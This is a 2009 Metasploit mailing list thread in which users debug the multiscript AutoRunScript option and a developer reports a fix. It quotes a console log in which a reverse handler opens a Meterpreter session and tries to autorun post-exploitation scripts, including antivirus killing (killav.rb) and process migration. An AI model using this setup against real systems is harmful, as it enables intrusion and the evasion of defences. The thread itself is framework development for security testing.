Metasploit mailing list archives

multihandler rc :?

From: carlos_perez at darkoperator.com (Carlos Perez)
Date: Thu, 1 Oct 2009 20:52:30 -0400

Fixed in SVN give it a try

Sent from my Mobile Phone

On Oct 1, 2009, at 11:15 AM, netevil <netevil at hackers.it> wrote:

Carlos Perez wrote:
Found the problem, I will have it up in the SVN tonight

Great Carlos! I will work on a more complex rc in the while... =)

David

Sent from my Mobile Phone
On Oct 1, 2009, at 9:37 AM, netevil <netevil at hackers.it> wrote:
Carlos Perez wrote:
In the multiscript ise the -s option and put the script with
option one per line onthe text file you call, I will remove the
option of passing the list of scripts thru a delimited string do
to the way the option are being parsed. Let me know if it works
that way

.. in the rc file i have 3 lines for those scripts calls!

msf exploit(handler) > set AutoRunScript multiscript.rb "-s
AliveAutopsy.rc"
AutoRunScript => multiscript.rb -s AliveAutopsy.rc
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Sending stage (719360 bytes)
[*] Running Multiscript script.....
[*] Running script List ...
[*]    running command run killav.rb
[-] Error: NameError undefined local variable or method `shell'
for #<#<Class:0xb64a9ff0>:0xb6a98600>
[-] Error in script: run killav.rb
[*]    running command run migrate.rb
[-] Error: NameError undefined local variable or method `shell'
for #<#<Class:0xb64a9ff0>:0xb6a98600>
[-] Error in script: run migrate.rb
[*]    running command run winemun.rb
[-] Error: NameError undefined local variable or method `shell'
for #<#<Class:0xb64a9ff0>:0xb6a98600>
[-] Error in script: run winemun.rb
[*]    running command
[-] Error: NameError undefined local variable or method `shell'
for #<#<Class:0xb64a9ff0>:0xb6a98600>
[-] Error in script:
[*] Meterpreter session 1 opened (192.253.128.100:53 ->
192.253.128.103:1055)